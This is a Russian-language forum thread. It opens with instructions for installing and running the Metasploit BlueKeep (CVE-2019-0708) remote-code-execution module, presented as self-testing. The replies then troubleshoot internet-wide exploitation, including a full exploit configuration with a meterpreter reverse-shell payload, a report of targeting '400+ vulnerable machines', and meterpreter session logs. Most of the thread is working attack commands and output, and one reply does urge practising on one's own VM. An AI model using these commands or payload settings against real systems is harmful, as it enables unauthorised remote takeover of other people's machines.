Soft Metasploit Эксплоит BlueKeep (CVE-2019-0708)

Вышел публичный эксплоит на уязвимость BlueKeep (CVE-2019-0708). Теперь он есть в составе Metasploit Framework, но пока еще не появился в deb пакетах.

Выпущенный эксплоит работает на следующих ОС и конфигурациях:
1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
2 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)
3 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)
4 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)

Для тех, кто хочет проверить СВОИ сервера на возможность практической реализации уязвимости, данный эксплоит его можно поставить вручную, для этого нужно с гитхаба скопировать ряд файлов и установить их в Metasploit.
Ниже привожу набор команд для установки эксплоита (пути указаны для стандартной установки Metasploit в Kali Linux):
Bash:
cd ~
mkdir backup
mkdir msf
mv /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb ~/backup/msf
mv /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb ~/backup/msf
mv /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb ~/backup/msf

wget -O /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb

wget -O /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

wget -O /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb

mkdir /usr/share/metasploit-framework/modules/exploits/windows/rdp
wget -O /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

Далее стандартный запуск:
Код:
msfconsole
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set rhosts 127.0.0.1
run

И если потребуется вернуть все на место:

Код:
mv ~/backup/msf/rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/
mv ~/backup/msf/cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
mv ~/backup/msf/rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
rm -rf /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
rm -rf ~/backup/

Удачных тестирований на проникновение!
 
Последнее редактирование:
Добрый день!
Подскажите а как реализовать данную уязвимость с разных подсетей или в мир.
 
Есть кто живые )))
Интересная тема до сих пор )))
Пытаюсь с вируалки с кали пробиться провайдер собака , юзаю ноип ксть ли шансы ?
 
Есть кто живые )))
Интересная тема до сих пор )))
Пытаюсь с вируалки с кали пробиться провайдер собака , юзаю ноип ксть ли шансы ?
нулевые. Пробуйте поднимать виртульную машину у себя и атаковать ее. Так и опыт наберете и под статью не попадете.
 
  • Нравится
Реакции: sk8den
нулевые. Пробуйте поднимать виртульную машину у себя и атаковать ее. Так и опыт наберете и под статью не попадете.
В локальной сети на hyper-v поднимаю виртуалку с кали , и сессия прилетает при эксплуатации , но задача стоит протестить наличие уязвимости из тырнетов , и тут то и косяк (((
сессии не прилетают )
Статья )))
за улучшение своего же оборудования не дадут )
 
так и не получилось, пробовал даже через ngrock хэндлер запускается но в конце это заевшее exploit successful but not session was created

По поводу статьи, статья действует на тех кто делает плохое зло) в моем случае я провожу тесты своей организации. И как всегда проблема с ИТ - отделом такая что для того что бы они подняли зад и пошли что то делать нужно что то точно сломать
 
так и не получилось, пробовал даже через ngrock хэндлер запускается но в конце это заевшее exploit successful but not session was created

По поводу статьи, статья действует на тех кто делает плохое зло) в моем случае я провожу тесты своей организации. И как всегда проблема с ИТ - отделом такая что для того что бы они подняли зад и пошли что то делать нужно что то точно сломать
у вас в локальной сети получается сессии поднимать ?
 
Не получается потому что атакующая машина и уязвимая находятся в разных подсетях
 
Больше подробностей - какую уязвимость эксплуатируем, как настроена ваша система которую атакуете, какое подключение к сети.
 
Больше подробностей - какую уязвимость эксплуатируем, как настроена ваша система которую атакуете, какое подключение к сети.
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set target 1
set GROOMSIZE 120
set GROOMBASE 120
set ForceExploit true
set VERBOSE true
set payload windows/x64/meterpreter/reverse_tcp_rc4
set lport 4446
set GROOMCHANNEL MS_T120
set DisablePayloadHandler true
set rc4password (мой пароль)
ни одной сессии из 400+ машин уязвимых (
 
Надо смотреть в сторону других уязвимостей . bluekeep не актуально , если и попадутся то пустые виртуалки, которые нах ненужны.
 
  • Нравится
Реакции: ghostphisher
meterpreter >
[-] Meterpreter session 1308 is not valid and will be closed
[*] xxx.xxx.xxx.xxx - Meterpreter session 1308 closed.
[*] Sending stage (200778 bytes) to xxx.xxx.xxx.xxx
[-] Meterpreter session 1309 is not valid and will be closed
[*] xxx.xxx.xxx.xxx - Meterpreter session 1309 closed.
[*] Sending stage (200778 bytes) to xxx.xxx.xxx.xxx

Как убить этот процесс? Бежит перед глазами, мешает работать с другими сессиями в хендлере.

Параметр set payload windows/x64/meterpreter/reverse_tcp_rc4 не могу изменить, так как тогда оборвутся другие сессии, или как?
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!